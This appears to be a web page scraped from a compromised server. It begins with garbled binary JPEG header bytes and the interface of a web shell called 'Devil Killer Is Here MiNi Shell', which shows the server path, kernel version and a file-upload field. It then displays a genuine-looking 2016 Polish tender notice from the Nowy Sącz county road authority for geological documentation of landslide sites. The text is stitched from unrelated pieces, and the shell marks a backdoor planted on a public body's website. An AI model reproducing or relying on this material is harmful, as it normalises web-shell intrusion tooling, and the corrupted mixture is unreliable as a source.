JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160603/68089-N-2016.html

<p class="kh_header"><b>Nowy Sącz: Wykonanie dokumentacji geologiczno - inżynierskiej</b><br>
<b>Numer ogłoszenia: 68089 - 2016; data zamieszczenia: 03.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Nowym Sączu , ul. Wiśniowieckiego 136, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4426488, faks 018 4426345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.nowy-sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji geologiczno - inżynierskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji geologiczno - inżynierskiej
Zadanie nr 1 - Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1572 K Grybów - Krużlowa Niżna - (na ul. Węgierskiej w m. Grybów) w km 0+170 - 0+410
Zadanie nr 2 - Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1572 K Grybów - Krużlowa Niżna - (na ul. Węgierskiej w m. Grybów) w km 0+410 - 0+440
Zadanie nr 3 - Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1537 K Gołkowice Górne - Łazy Brzyńskie w m. Łazy Brzyńskie w km 3+720 - 3+740
Przedmiotem zamówienia są wymagania dotyczące wykonania i odbioru projektu robót geologicznych (zwanej dalej PRG) i dokumentacji geologiczno - inżynierskiej (zwanej dalej DGI).
Wymagania dotyczące przedmiotu zamówienia:
A. Wstęp.
1. PRG powinien stanowić opis robót geologicznych, które pozwolą na:
a) rozpoznanie budowy geologicznej podłoża oraz utworów koluwialnych wraz 
z ustaleniem przebiegu powierzchni poślizgu,
b) opis cech fizyko - mechanicznych gruntów,
c) określenie warunków hydrogeologicznych ,
d) ocenę warunków geologiczno - inżynierskich w rejonie występowania osuwisk wraz z prognozą wpływu inwestycji na środowisko,
e) zapewnienie rozwiązania wszystkich istotnych spraw z punktu widzenia zamawiającego i projektu w stopniu umożliwiającym zabezpieczenie drogi 
i stabilizację osuwiska.
2. DGI powinna dać wyczerpujące i jednoznaczne informacje obejmujące:
a) budowę geologiczną podłoża jak i obszaru występowania osuwisk,
b) określenie powierzchni poślizgu, przebiegu ruchów grawitacyjnych oraz warunków gruntowo - wodnych,
c) wydzielenie warstw geotechnicznych i określenie charakteryzujących je parametrów,
d) warunków geologiczno - inżynierskich w rejonie prowadzonych prac zabezpieczających,
e) ocenę możliwości realizacji projektowanej inwestycji (zabezpieczenia),
f) zalecenia dotyczące sposobu wykonania i prowadzenia prac ziemnych w tym odwodnienia terenu,
g) ustalenia kategorii geotechnicznej obiektu,
B. Zakres prac związanych z wykonywaniem projektu jak i dokumentacji:
1. Sporządzając PRG należy:
a) sporządzić mapę sytuacyjno - wysokościową w skali 1:500,
b) uzgodnić wykonanie zakresu robót terenowych i badań laboratoryjnych z PIG,
c) przeprowadzić wizję terenową wraz z uzgodnieniem wejścia w teren 
w miejscach przewidzianych do wykonania wierceń i innych robót polowych,
d) wykorzystać dostępne materiały archiwalne i dokumentacyjne.
2. Podstawą wykonania DGI jest realizacja wszelkich prac na podstawie zatwierdzonego w drodze administracyjnej PRG oraz wymagania ogólne 
i szczegółowe,
3. Wykonać badania i dokumentację geologiczno - inżynierską na podstawie karty dokumentacyjnej osuwiska i karty osuwiskowej.
C. Wymagania ogólne.
Zamawiający zastrzega obowiązek stosowania następujących przepisów, instrukcji 
i norm.
1. Ustawa - Prawo geologiczne i górnicze z dnia 9 czerwca 2011 r. - (Dz. U. z 2015 r., poz. 196),
2. Rozporządzenie Ministra Środowiska z dnia 20 grudnia 2011 r. w sprawie szczegółowych wymagań dotyczących projektów robót geologicznych, w tym robót, których wykonywanie wymaga uzyskania koncesji - (Dz. U. z 2011 r., Nr 288, poz. 1696),
3. Rozporządzenie Ministra Środowiska z dnia 8 maja 2014 r. - w sprawie dokumentacji hydrogeologicznej i dokumentacji geologiczno - inżynierskie (Dz. U. z 2014 r. poz. 596),
4. Zasady sporządzania dokumentacji geologiczno - inżynierskich - PIG,
5. Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. - w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych (Dz. U. z 2012 r. poz. 463),
6. Instrukcja badań podłoża gruntowego budowli drogowych i mostowych,
7. Polskie Normy
D. Wymagania szczegółowe.
Wyrobiska badawcze powinny być zaprojektowane i wykonane w sposób umożliwiający szczegółowe rozpoznanie budowy geologicznej z uwzględnieniem specyfiki i złożoności warunków geologiczno - inżynierskich osuwisk. Wymagana głębokość otworów powinna być tak zaprojektowana aby umożliwić rozpoznanie koluwiów, powierzchni poślizgu i nie płytsza niż 3.0 do 5.0 m poniżej stropu skał nieobjętych ruchami grawitacyjnymi.
Projektowane otwory powinny być pełnordzeniowe (podwójny aparat rdzeniowy) 
i umożliwić określenie rozciągłości i miąższości koluwiów oraz wykształcenia podłoża osuwiska. Powinny określić stan gruntów na obszarach osuwiskowych w strefach zagrożeń.
W PRG i w DGI należy przewidzieć wykonanie systemu monitoringu w postaci inklinometru i towarzyszącego mu piezometru o głębokości popartej wynikami DGI. W rejonach występowania gruntów słabonośnych oraz w strefach aktywnych osuwisk należy przewidzieć dodatkowe wiercenia w celu możliwości dalszej obserwacji przemieszczeń powierzchniowych i podziemnych.
Projektowane opróbowanie otworów wiertniczych powinno umożliwić:
a) określenie parametrów geotechnicznych - projektowana ilość badań laboratoryjnych parametrów geotechnicznych powinna umożliwić określenie zmienności cech fizyczno - mechanicznych gruntów koluwialnych jak i skał podłoża. Badania laboratoryjne należy przeprowadzić dla wydzielonych warstw różniących się właściwościami geotechnicznymi.
E. Inne ustalenia:
PRG przed złożeniem do zatwierdzenia przez organ administracji geologicznej Wykonawca przedstawi do akceptacji Zamawiającemu oraz przedstawicielowi PIG, którzy w ciągu 14 dni mogą zgłosić zastrzeżenia i proponowane uzupełnienia 
- należy uzyskać opinię PIG do PRG.
F. Odbiór robót:
1. PRG i DGI ma zawierać:
a) część tekstową napisana na komputerze
b) przejrzystą szatę graficzną w której należy przedstawić:
- mapę geologiczną
- szczegółową mapę osuwisk
- profile i przekroje geologiczne
- karty otworów i wyrobisk
- wykresy i inne wyniki
c) zestawienia tabelaryczne wyników
Do części tekstowej należy dołączyć wszystkie uzgodnienia, notatki służbowe 
i protokoły związane z ich realizacją.
2. Sporządzoną DGI przed złożeniem do przyjęcia przez organ administracji geologicznej Wykonawca przedstawia zamawiającemu do akceptacji a PIG do opiniowania. Należy uzyskać opinię PIG do DGI.
3. W ciągu 14 dni Zamawiający sprawdzi zgodność jej wykonania.
4. W przypadku stwierdzenia, że dokument nie spełnia wymogów Specyfikacji Wykonawca DGI zobowiązany jest do usunięcia braków.
5. Wykonawca przekazuje Zamawiającemu DGI po uzyskaniu zawiadomienia organu administracji geologicznej o przyjęciu dokumentacji bez zastrzeżeń w postaci:
a) dokumentów oprawionych metodą bindowania w 4 egzemplarzach,
b) dokumentów zapisanych w formie elektronicznej w formie rozszerzenia JPEG, TIFF, a tekst w formacie DOC, RTF oraz PDF.
6. Sporządzoną DGI przed złożeniem do przyjęcia przez organ administracji geologicznej Wykonawca przedkłada do zaopiniowania do Wojewódzkiego Zespołu Nadzorującego Realizację Zadań W Zakresie Przeciwdziałania Ruchom Osuwiskowym Oraz Usuwania Ich Skutków - Małopolski Urząd Wojewódzki 
w Krakowie Wydział Rolnictwa..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca nie jest zobowiązany do wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - Zamawiający nie stawia w tym zakresie szczególnych wymagań - Wykonawca potwierdza spełnianie warunku poprzez złożenie Oświadczenie - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia - Wykonawca wykaże, że:
a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługę 
w zakresie wykonanych robót geologiczno - inżynierskich zgodnych 
z przedmiotem zamówienia, tj. wszelkie opracowane PRG i DGI stanowiące podstawę rozwiązania problemów związanych z osuwiskami wykonanymi na obszarze o skomplikowanej budowie geologicznej.
Na potwierdzenie spełnienia warunku posiadania wiedzy i doświadczenia Wykonawca złoży Wykaz usług zgodnie z zał. nr 5 do SIWZ wraz 
z załączeniem dowodów dotyczących najważniejszych usług, określających, czy usługi te zostały wykonane należycie oraz Oświadczenie - załącznik nr 4 do SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniana będzie ich łączna wiedza 
i doświadczenie. W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania ww. dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia - Zamawiający nie stawia w tym zakresie szczególnych wymagań - Wykonawca potwierdza spełnianie warunku poprzez złożenie Oświadczenie - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia - Zamawiający wymaga aby Wykonawca dysponował odpowiednio wykwalifikowanym n/w personelem tj. geologiem posiadającym uprawnienia zakres dla kategorii VI lub VII.
Na potwierdzenie warunku Wykonawca złoży Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia zgodnie z zał. nr 6 do SIWZ 
i Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia zgodnie z zał. nr 7 do SIWZ oraz Oświadczenie - załącznik nr 4 do SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców oceniany będzie ich łączny potencjał kadrowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Zamawiający nie stawia w tym zakresie szczególnych wymagań - Wykonawca potwierdza spełnianie warunku poprzez złożenie Oświadczenie - załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty, według wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ,
2. Oświadczenie o solidarnej odpowiedzialności wykonawców oraz o ustanowieniu pełnomocnika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W nawiązaniu do art. 144 ust. 1 ustawy Pzp zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, poza zmianami wynikającymi z sytuacji niemożliwych wcześniej do przewidzenia:
Okoliczności te dotyczą sytuacji gdy nastąpi:
I. zmiana terminu realizacji przedmiotu umowy spowodowana:
1) warunkami atmosferycznymi:
a) klęski żywiołowe;
2) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego:
a) wstrzymanie realizacji umowy przez Zamawiającego;
b) konieczność wprowadzenia zmian w koncepcji na wniosek Zamawiającego;
II. zmiana sposobu spełnienia świadczenia
1) Zmiany organizacji spełniania świadczenia:
a) zmiana treści dokumentów przedstawianych wzajemnie przez strony 
w trakcie realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie może spowodować braku informacji niezbędnych zamawiającemu do prawidłowej realizacji umowy.
III. Pozostałe zmiany:
1) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
2) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy 
o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
3) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. 
W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami;
IV. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
V. Nie stanowi istotnej zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego, zmiana formy wniesienia zabezpieczenia należytego wykonania umowy);
2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Nowym Sączu, 33-300 Nowy Sącz, ul. Wiśniowieckiego 136.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2016 godzina 10:00, miejsce: Powiatowy Zarząd Dróg w Nowym Sączu, 33-300 Nowy Sącz, ul. Wiśniowieckiego 136, pok nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1572 K Grybów - Krużlowa Niżna - (na ul. Węgierskiej w m. Grybów) w km 0+170 
- 0+410.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji geologiczno - inżynierskiej w ramach zadania pn. Stabilizacja i zabezpieczenie usuwiska wraz z odbudową drogi powiatowej nr 1572 K Grybów - Krużlowa Niżna - (na ul. Węgierskiej w m. Grybów) w km 0+170 
- 0+410.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
